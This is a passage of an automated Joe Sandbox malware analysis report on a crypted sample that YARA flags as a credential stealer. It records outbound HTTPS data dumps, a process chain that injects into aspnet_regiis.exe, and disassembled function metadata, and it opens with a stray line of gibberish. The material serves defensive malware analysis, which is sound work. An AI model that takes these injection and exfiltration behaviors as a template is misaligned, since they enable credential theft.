6K5eK,w\z,B#1w8-1Az!}2R~:,CfwekfDOsLRb1@g=i<74S_5[i#b\|{EW_\|OOH?);El~VsIiC4xb}^pi5vXDS3e_E3N3CiVl8~0
2024-12-18 13:47:13 UTC	15331	OUT	Data Raw: c4 3f 61 3f 84 01 c9 ec 5f b0 37 17 17 aa c8 8e 69 cf 50 cd 4f e0 94 d2 1e 01 b6 50 f5 9c 84 57 2f c0 9d d4 01 eb b7 37 5f 5d dc 60 1a 2d 08 80 bb 01 25 07 3f f4 2b 70 70 50 fb 61 38 85 d6 d7 1a 91 ee f3 d0 b1 37 2b b3 73 b7 ac 87 a5 85 5b cf 78 33 1d 38 8f 04 bf ab c6 8c 3a 8f fc a3 54 c9 5e 9f ba 34 87 f5 19 a4 dd 6c 1d 32 7b 70 98 7b 77 af 40 9e 2e 02 fb c8 88 c4 75 be cc 50 fb 20 77 94 03 63 a7 41 b6 ee 90 ff 35 61 b0 70 56 10 2c 87 b1 77 02 87 3e 71 3b 63 88 a0 9f c3 aa d9 e7 eb f7 06 9c c5 4c d7 0f 08 39 46 58 6e 84 ec 7a 08 26 76 1c 1b c2 b1 2e 66 fc 6b f7 95 ca 61 d2 57 59 9f 49 1d bd 76 d9 f1 8f 84 d9 c1 d0 d7 44 f2 a4 bf 74 6c 45 f4 01 54 f1 ac 7f ac 9b bc c1 8f 3d 6f 4d f0 85 61 d6 ca 20 99 ac ad 7c f3 9f 8c 37 d2 12 af 72 1f 8d 36 b3 9e c5 b5 Data Ascii: ?a?_7iPOPW/7_]`-%?+ppPa87+s[x38:T^4l2{p{w@.uP wcA5apV,w>q;cL9FXnz&v.fkaWYIvDtlET=oMa \|7r6
2024-12-18 13:47:13 UTC	15331	OUT	Data Raw: 15 7e f4 f7 3b 6c 87 79 2c 0f d2 ec 5f 37 09 ee 44 13 69 b9 50 a4 87 ff ba 23 2e 6f e9 47 bd 49 cc 2d 0c 77 b7 a3 67 5a d4 f4 c1 b3 d9 1e 19 e1 1c 8e 2f 0e 2e 78 e6 2f 5f d2 df 11 45 7e ec 8a 2a 34 ce 60 e4 5d c1 dd 49 dc 9d d9 13 bd d4 06 80 80 2c 14 86 8a c8 85 01 de 8c 18 bd 1f 8d 20 32 19 4e 10 73 c3 c9 46 fc 78 5f ff 6b bf 2c 44 be 21 d8 b3 f5 bf 22 e4 ff 75 53 c6 71 8e f2 34 07 40 f9 26 0f 3b cf 9d cd 69 a7 a0 58 e4 cf 0f 1e ce 94 dd cc f3 21 52 6a 1f b6 66 5e e3 05 87 d5 f9 60 04 c8 b8 be a6 43 fa af fd 90 10 8b c7 72 1d dd 6e f5 9b 93 da da 7c fc ed 41 9d 55 c9 99 a0 3c a1 51 2c 38 0b d9 73 01 b3 55 84 96 cb 0d 19 48 99 5e 44 da 87 f3 47 08 4f 5d f3 53 03 ce e8 95 6b 13 bd 95 c8 2d f9 39 14 e8 d2 8b 18 1a 1f 20 b7 5f cc 6c 8c 10 1a 3b 7d 25 0d 92 Data Ascii: ~;ly,_7DiP#.oGI-wgZ/.x/_E~*4`]I, 2NsFx_k,D!"uSq4@&;iX!Rjf^`Crn\|AU<Q,8sUH^DGO]Sk-9 _l;}%
2024-12-18 13:47:13 UTC	15331	OUT	Data Raw: a0 ed f6 bd ba 97 00 49 c7 bd 8e 7f 2d e5 15 28 ca ba 36 e2 91 80 45 f7 7a 80 9c a4 c2 a7 ef ea 76 27 22 a0 3d ed 44 92 67 8d 6c 0d 69 cf a9 94 0b 82 75 c2 40 b3 5b 88 14 bf 29 f6 13 d6 e9 f2 c2 65 d6 23 fb e2 ee 35 d9 36 2b e3 fd fb f1 b9 6f 60 49 e7 e4 3d 60 64 0c e0 65 79 a6 bb 35 20 b8 32 b1 fb b7 d3 58 4d a6 44 61 ee 31 58 9c ff 52 ea 7e fc 31 d8 5f a9 14 17 8c 2c 45 6a b3 f4 c3 2a 67 4e 4f 93 2d b1 f3 47 eb 15 b1 4d 8c ec cc d2 78 c0 e3 e4 c4 39 cc 32 42 68 1e c6 5c 7f 76 98 5d a4 e2 a9 e9 cb 39 c1 fe 1e 48 d1 fc 08 da 1a 83 bb 96 9b aa 67 78 f6 2d 99 bf 35 4f 42 e2 11 54 ed 3d 38 5c 92 8a a9 42 7a 98 7e 0b aa 44 a0 61 48 29 60 66 f4 87 2b d7 f1 8c 43 76 48 c6 68 51 92 8e 72 f0 22 a7 88 89 3d 3e 8c e9 8a a1 e2 f7 f6 db 72 c6 a1 5a 85 ca a7 a4 71 3d Data Ascii: I-(6Ezv'"=Dgliu@[)e#56+o`I=`dey5 2XMDa1XR~1_,Ej*gNO-GMx92Bh\v]9Hgx-5OBT=8\Bz~DaH)`f+CvHhQr"=>rZq=
2024-12-18 13:47:13 UTC	15331	OUT	Data Raw: 1f 6c e8 cf 50 a5 21 d2 21 6e be c4 d3 5f c0 88 f9 5d 43 3b 49 ff fa 42 37 04 f0 ad 5f 3c cd 7b 14 86 1e 5c a7 50 c2 1e 4b d4 47 be 6c da 1d 54 d9 c1 e3 10 8f 6a 10 cd 61 b8 fd 5b 14 1e b9 58 ae 03 e7 7b 2f 5f 84 cd 10 40 4a a7 2e 37 25 2b 67 7d d2 66 b4 c2 88 b3 13 1d 62 a4 1a 93 2f 21 e5 d8 00 89 4a f9 23 50 fb 49 21 06 db 5f 2f 19 0a 15 dc 7a 1d 4f b3 d5 01 10 27 e1 33 67 b9 2f 37 74 fd bb 7d 82 34 b0 ac 9e 7e cc 0f e6 f4 61 03 4a 20 f8 10 92 02 31 86 a3 44 40 63 11 65 af 6e ef 07 17 72 c9 d2 fb 77 ed 5f 57 ed 1e d8 0d 0f 0d c0 58 03 de ad 67 3c 6a 36 27 00 90 cb 06 4b 51 f2 8f 8d de dd b8 c5 09 74 b9 4a b1 1a 4e 25 81 a2 b4 e1 99 a6 bc 8f 3a 26 24 34 cf 0d 01 af 61 1d 0b 0f 97 d9 8f 5c ec 82 41 af 71 11 d2 62 46 60 74 ea dd d5 f6 bd 71 ea 23 59 72 88 Data Ascii: lP!!n_]C;IB7_<{\PKGlTja[X{/_@J.7%+g}fb/!J#PI!_/zO'3g/7t}4~aJ 1D@cenrw_WXg<j6'KQtJN%:&$4a\AqbF`tq#Yr
2024-12-18 13:47:13 UTC	15331	OUT	Data Raw: e1 c1 5e b7 5f 3a bc 2b 1c 44 4f da 4d d7 41 d1 3f 25 6f d4 fc 3d a4 d5 de b5 31 58 7d 33 5c 90 77 7e cf c3 80 b6 4b 98 e7 26 61 39 15 01 b7 0a 6f fc 79 6e b1 3b fc fc 69 60 0e 6a 8b 1e 7e f5 b1 19 55 a5 29 26 1c 50 ef d3 05 46 bf 76 07 ad 04 2c e2 56 75 be 0e 0a 84 84 87 2f 0c 0e f9 20 d8 50 8f 52 69 f1 b2 db 9c 4c 45 19 af c6 27 63 b2 a8 61 ac 9b 92 fa 73 b3 6a 7e 3a 86 c3 74 33 5e bc 38 c5 9c 6e b9 8b 00 c6 26 e9 41 3f 16 af 6f bd 32 e2 45 23 f5 c3 d9 fd 25 5f 33 fb f5 63 b1 07 a8 2a ec b1 c3 e9 a7 3f 32 3d de 87 74 b4 41 b7 37 93 7f 0a 59 b2 66 92 f9 4b de 9b b8 a7 5a 9f 50 a3 df bf fc 68 f8 09 68 a9 3c bc f1 8f dd e3 f4 fc 73 42 ac e1 3d d0 76 76 6f d5 34 9f a2 ec c6 9c e1 86 8c ed 8a 9d 46 81 f9 a2 ee cb ce 8b 4e ab ba 31 dc cd 9c a1 a2 04 d6 96 8e Data Ascii: ^_:+DOMA?%o=1X}3\w~K&a9oyn;i`j~U)&PFv,Vu/ PRiLE'casj~:t3^8n&A?o2E#%_3c*?2=tA7YfKZPhh<sB=vvo4FN1
2024-12-18 13:47:13 UTC	15331	OUT	Data Raw: f7 76 41 bc 7f dc aa bf 6d 3e 68 b1 08 7b 5b fe 08 ea 7a 8b c4 2f 02 4c f5 85 eb 28 b6 34 28 7d 82 4c e9 b1 21 76 bd 42 3d 57 fa 6d c7 ca a6 3c 16 1f ef 14 06 51 9b 25 9f c2 ed de cd 25 32 12 c7 c4 e7 f4 45 42 d7 38 ce d2 60 dd 4d 1d 10 55 08 cc 89 f5 ac bd b6 6e 02 12 02 08 d9 d3 67 d9 26 7e 50 e9 5d ac cf d3 74 e9 db 0e 96 19 4e d9 46 c2 c2 b0 cd 70 55 54 c8 d9 6f d5 97 1f 28 85 7b 6e 96 24 90 d1 d1 06 3c 31 71 17 93 37 cd 8c 51 61 c6 46 88 1c f6 52 75 0a a6 51 af c0 22 34 e8 a9 fa 66 a3 f6 61 66 93 e0 88 09 c9 5c bb 69 b9 4d 4d 5b 95 91 ca cb 9e a7 12 30 0f b1 05 d2 a1 ee 9f 92 0b 12 75 c0 8c c1 08 a7 82 69 8c 9c 3b 40 36 56 d4 9f 12 b3 44 47 96 61 c4 85 5f 2a c2 b8 cd 76 48 4f ad c0 16 52 e9 0b 4b 5d 93 c9 74 d6 7b af c9 d8 83 6d 1c a5 c4 2f 1f 58 bf Data Ascii: vAm>h{[z/L(4(}L!vB=Wm<Q%%2EB8`MUng&~P]tNFpUTo({n$<1q7QaFRuQ"4faf\iMM[0ui;@6VDGa_*vHORK]t{m/X
2024-12-18 13:47:13 UTC	15331	OUT	Data Raw: 5b c7 ba 2b dd 3f 99 b5 a0 a2 6c 2a f3 0d 35 fd cd f2 fd db 5d 88 22 d6 73 d5 86 4c 1f 4e 6d c6 b1 9f af 57 9e 67 af df 49 cb 5a 1c 9c 3f 5f 30 18 ec be e4 1b 51 53 3b 3d 7a 72 5c 9f f9 52 f6 89 c2 68 80 df 68 88 8a 70 df 89 a0 fa c8 a7 dc 65 52 88 3e 33 c2 12 19 92 d8 cd e8 1b 5e db 49 63 fa 66 70 22 0e b8 be 6d ac 3d 5f f0 8e a1 1f 52 76 8a 3d b8 e8 7e ab c4 5c f6 b8 c9 97 86 f7 77 b3 6e cd 18 16 04 e0 f3 3a a7 cd 31 0b 9f ec c8 e7 6d 72 13 6a 9e 0a 0e 6d 34 48 0d f7 19 36 b8 e1 17 e6 f1 ac 7b 24 19 3f fb 0a 4b 8b 60 37 7f 58 cb 64 e5 8f 9c da 09 e2 47 3f 43 54 22 43 a3 68 87 50 03 1f b8 09 fd 05 7f 0e fe e7 3e 8b 8d 57 0e 9a f0 78 c7 ca df 26 a7 61 24 64 26 8d 32 0d a0 53 df cf 99 4c b0 b8 86 73 37 92 d9 8b 0a e0 91 c9 d3 dd 21 a2 8a 70 f2 da 4f 40 70 Data Ascii: [+?l*5]"sLNmWgIZ?_0QS;=zr\RhhpeR>3^Icfp"m=_Rv=~\wn:1mrjm4H6{$?K`7XdG?CT"ChP>Wx&a$d&2SLs7!pO@p
2024-12-18 13:47:16 UTC	1038	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 13:47:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=re1ugbna6iqljketpv7q2umd6v; expires=Sun, 13-Apr-2025 07:33:54 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ePZMyLypuyfzor7DMzdVKE3KKwgeIAyszg4LIKHVoSl3n2GQsbJThrKDiDOXZOik0bDatxxSGAIWSgwDIdObmvTn1n8DX69wCOAKJULnU4MI4fhhnpBi82xB4H%2BpwjK2BAs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3f9a815a23efa3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2023&min_rtt=2023&rtt_var=758&sent=365&recv=615&lost=0&retrans=0&sent_bytes=2835&recv_bytes=590979&delivery_rate=1443400&cwnd=114&unsent_bytes=0&cid=c0558409b81c52ab&ts=2747&x=0"

Target ID:	0
Start time:	08:46:35
Start date:	18/12/2024
Path:	C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe"
Imagebase:	0x950000
File size:	641'536 bytes
MD5 hash:	795197155CA03F53EED7D90A2613D2A7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	08:46:35
Start date:	18/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	08:46:35
Start date:	18/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
Imagebase:	0xa0000
File size:	43'016 bytes
MD5 hash:	5D1D74198D75640E889F0A577BBF31FC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1965031546.0000000002C19000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1921423227.0000000002C19000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.2014107650.0000000002C19000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.2034108887.0000000002BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1967689413.0000000002C19000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.2021275005.0000000002C19000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1966024248.0000000002C19000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1921687992.0000000002C19000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1866290772.0000000002BCD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1964834206.0000000002C17000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1921423227.0000000002BCD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1866213868.0000000002C19000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1867576709.0000000002C16000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.2013964863.0000000002C18000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1920704083.0000000002C18000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.2013739073.0000000002C0A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1866963896.0000000002BCD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	08:47:16
Start date:	18/12/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7408 -s 1648
Imagebase:	0x9a0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	38.2%
Total number of Nodes:	68
Total number of Limit Nodes:	3

Executed Functions

Function 6CDC11C0 Relevance: 55.5, APIs: 14, Strings: 14, Instructions: 6500filememoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 6CDC6C4B
GetModuleHandleA.KERNEL32 ref: 6CDC6CE7
K32GetModuleInformation.KERNEL32 ref: 6CDC6DE6
GetModuleFileNameA.KERNEL32 ref: 6CDC6E0F
CreateFileA.KERNELBASE ref: 6CDC6E50
CreateFileMappingA.KERNEL32 ref: 6CDC6EF5
CloseHandle.KERNEL32 ref: 6CDC6F2B
MapViewOfFile.KERNELBASE ref: 6CDC7043
VirtualProtect.KERNELBASE ref: 6CDC7391
VirtualProtect.KERNELBASE ref: 6CDC742E
CloseHandle.KERNELBASE ref: 6CDC7543
CloseHandle.KERNEL32 ref: 6CDC7554
CloseHandle.KERNEL32 ref: 6CDC7565
GetCurrentProcess.KERNEL32 ref: 6CDC7C6A

Strings

T, xrefs: 6CDC6A76
T-L, xrefs: 6CDC35E1
T-L, xrefs: 6CDC11E8
DI5<, xrefs: 6CDC6587
]Vi, xrefs: 6CDC4FB0
T, xrefs: 6CDC6B0A
~+5W, xrefs: 6CDC383D
@\, xrefs: 6CDC5F17
i}R, xrefs: 6CDC4B14
@\, xrefs: 6CDC5F94
YPG, xrefs: 6CDC4E97
#D@M, xrefs: 6CDC5538
@, xrefs: 6CDC7385
DI5<, xrefs: 6CDC6605

Memory Dump Source

Source File: 00000000.00000002.1696344413.000000006CDC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDC0000, based on PE: true

Associated: 00000000.00000002.1696324315.000000006CDC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394852.000000006CDE4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696416033.000000006CDEB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696498334.000000006CE2E000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696527847.000000006CE38000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdc0000_Armanivenntii_crypted_EASY.jbxd

Similarity

API ID: Handle$CloseFile$Module$CreateCurrentProcessProtectVirtual$InformationMappingNameView
String ID: #D@M$@$DI5<$DI5<$T-L$T-L$]Vi$i}R$~+5W$T$T$YPG$@\$@\
API String ID: 3687506085-19812728
Opcode ID: d6233101f3ac3feba623ba65a76633ba947863e4ec047caeae146660396a6360
Instruction ID: 5a109a83116fc4826344168578ec3ea29e655a4a998189ff217fc7603735cccf
Opcode Fuzzy Hash: d6233101f3ac3feba623ba65a76633ba947863e4ec047caeae146660396a6360
Instruction Fuzzy Hash: 56C3EE31B44615CFDF04CF3CC8853D9B7F9AB46315F11928AD868AB6A1D7399A89CF02

Function 6CDC8810 Relevance: 14.7, APIs: 3, Strings: 5, Instructions: 670
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?), ref: 6CDC9081

Strings

NtQueryInformationProcess, xrefs: 6CDC8B09, 6CDC9089
1L8F, xrefs: 6CDC8BBF
1L8F, xrefs: 6CDC8AB8
ntdll.dll, xrefs: 6CDC8AF5, 6CDC9075
A"c, xrefs: 6CDC8D87

Memory Dump Source

Source File: 00000000.00000002.1696344413.000000006CDC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDC0000, based on PE: true

Associated: 00000000.00000002.1696324315.000000006CDC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394852.000000006CDE4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696416033.000000006CDEB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696498334.000000006CE2E000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696527847.000000006CE38000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdc0000_Armanivenntii_crypted_EASY.jbxd

Similarity

API ID: HandleModule
String ID: 1L8F$1L8F$A"c$NtQueryInformationProcess$ntdll.dll
API String ID: 4139908857-439188107
Opcode ID: 2e419c5f25f74ff71e00304b42fad64605495dde7944a58ef0b9f3df09ec43fb
Instruction ID: 2b479e42d284dcf8d5d24189cdf096218d89a9d347708b6921fc48f18b033113
Opcode Fuzzy Hash: 2e419c5f25f74ff71e00304b42fad64605495dde7944a58ef0b9f3df09ec43fb
Instruction Fuzzy Hash: C032F176B04204CFCB04CFBCD9957CE7BF6AB86314F10851AD865DB7A4CA369909CB82

Non-executed Functions

Function 6CDD7CC1 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,00000000), ref: 6CDD7CCD
IsDebuggerPresent.KERNEL32 ref: 6CDD7D99
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6CDD7DB2
UnhandledExceptionFilter.KERNEL32(?), ref: 6CDD7DBC

Memory Dump Source

Source File: 00000000.00000002.1696344413.000000006CDC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDC0000, based on PE: true

Associated: 00000000.00000002.1696324315.000000006CDC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394852.000000006CDE4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696416033.000000006CDEB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696498334.000000006CE2E000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696527847.000000006CE38000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdc0000_Armanivenntii_crypted_EASY.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: cb0bf5cf38ef149ca31c29f495cbb49bf64e6a64b926c24e3851715335d5b5bd
Instruction ID: de95943cc402562c8a25ba1b6123d0420ff2a858ff1c4738ee013e41de694c57
Opcode Fuzzy Hash: cb0bf5cf38ef149ca31c29f495cbb49bf64e6a64b926c24e3851715335d5b5bd
Instruction Fuzzy Hash: 92313675D01318EBDF20DFA0D9487CDBBB8AF08304F1141EAE50CAB250EB70AA848F55

Function 6CDD76D1 Relevance: 6.0, APIs: 4, Instructions: 12COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,6CDD77F1,6CDE4934), ref: 6CDD76D6
UnhandledExceptionFilter.KERNEL32(?), ref: 6CDD76DF
GetCurrentProcess.KERNEL32(C0000409), ref: 6CDD76EA
TerminateProcess.KERNEL32(00000000), ref: 6CDD76F1

Memory Dump Source

Source File: 00000000.00000002.1696344413.000000006CDC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDC0000, based on PE: true

Associated: 00000000.00000002.1696324315.000000006CDC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394852.000000006CDE4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696416033.000000006CDEB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696498334.000000006CE2E000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696527847.000000006CE38000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdc0000_Armanivenntii_crypted_EASY.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID:
API String ID: 3231755760-0
Opcode ID: e45afc1b7426f2e9be632d06f1d034da1576877aeb0cd4d21d9d1e047677aa7f
Instruction ID: 70f400d81a6fdd2f0ca3e115b74cc2b1243a2bd543411982f4da1863f6c5877e
Opcode Fuzzy Hash: e45afc1b7426f2e9be632d06f1d034da1576877aeb0cd4d21d9d1e047677aa7f
Instruction Fuzzy Hash: 37D01232600208ABEF902BE1E80CB993F3CFB0E222F010420F71E82000CB7944548B61

Function 6CDD6990 Relevance: 5.7, Strings: 4, Instructions: 662COMMON

Download Yara Rule

Strings

2Iu4, xrefs: 6CDD705D
3%OE, xrefs: 6CDD6EAF
!l,v, xrefs: 6CDD7313
!l,v, xrefs: 6CDD715D

Memory Dump Source

Source File: 00000000.00000002.1696344413.000000006CDC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDC0000, based on PE: true

Associated: 00000000.00000002.1696324315.000000006CDC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394852.000000006CDE4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696416033.000000006CDEB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696498334.000000006CE2E000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696527847.000000006CE38000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdc0000_Armanivenntii_crypted_EASY.jbxd

Similarity

API ID:
String ID: !l,v$!l,v$2Iu4$3%OE
API String ID: 0-3794875722
Opcode ID: d8b33f9ce38e29cb3ea4694bf6636af631a582b0216bc129cdfe1ddebbab8453
Instruction ID: 237d1e16ed5229446f913b08f6668511442f840d1ecd481b020bc21a1bd73605
Opcode Fuzzy Hash: d8b33f9ce38e29cb3ea4694bf6636af631a582b0216bc129cdfe1ddebbab8453
Instruction Fuzzy Hash: 87323436E44105DFCB04CFBCD5C07DD7BF2AB86310F12651AE861EBB68D229A94ACB51

Function 6CDDBCF5 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6CDDBDED
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6CDDBDF7
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6CDDBE04

Memory Dump Source

Source File: 00000000.00000002.1696344413.000000006CDC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDC0000, based on PE: true

Associated: 00000000.00000002.1696324315.000000006CDC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394852.000000006CDE4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696416033.000000006CDEB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696498334.000000006CE2E000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696527847.000000006CE38000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdc0000_Armanivenntii_crypted_EASY.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 78d2bab9148313b1f85da55499cd5066334642f63a46ad444aace20b87c209aa
Instruction ID: 469ee23880e87f511816d6dddb4f7264618fbfc3787b4ccc16b9ef8b50d4c4bc
Opcode Fuzzy Hash: 78d2bab9148313b1f85da55499cd5066334642f63a46ad444aace20b87c209aa
Instruction Fuzzy Hash: A031F470D01218ABCB21DF64D888BDCBBB8FF08314F5041EAE51CA72A0E770AB858F55

Function 6CDC7D50 Relevance: 3.3, Strings: 2, Instructions: 800COMMON

Download Yara Rule

Strings

0;l, xrefs: 6CDC85E0
KCn, xrefs: 6CDC7D76

Memory Dump Source

Source File: 00000000.00000002.1696344413.000000006CDC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDC0000, based on PE: true

Associated: 00000000.00000002.1696324315.000000006CDC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394852.000000006CDE4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696416033.000000006CDEB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696498334.000000006CE2E000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696527847.000000006CE38000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdc0000_Armanivenntii_crypted_EASY.jbxd

Similarity

API ID:
String ID: 0;l$KCn
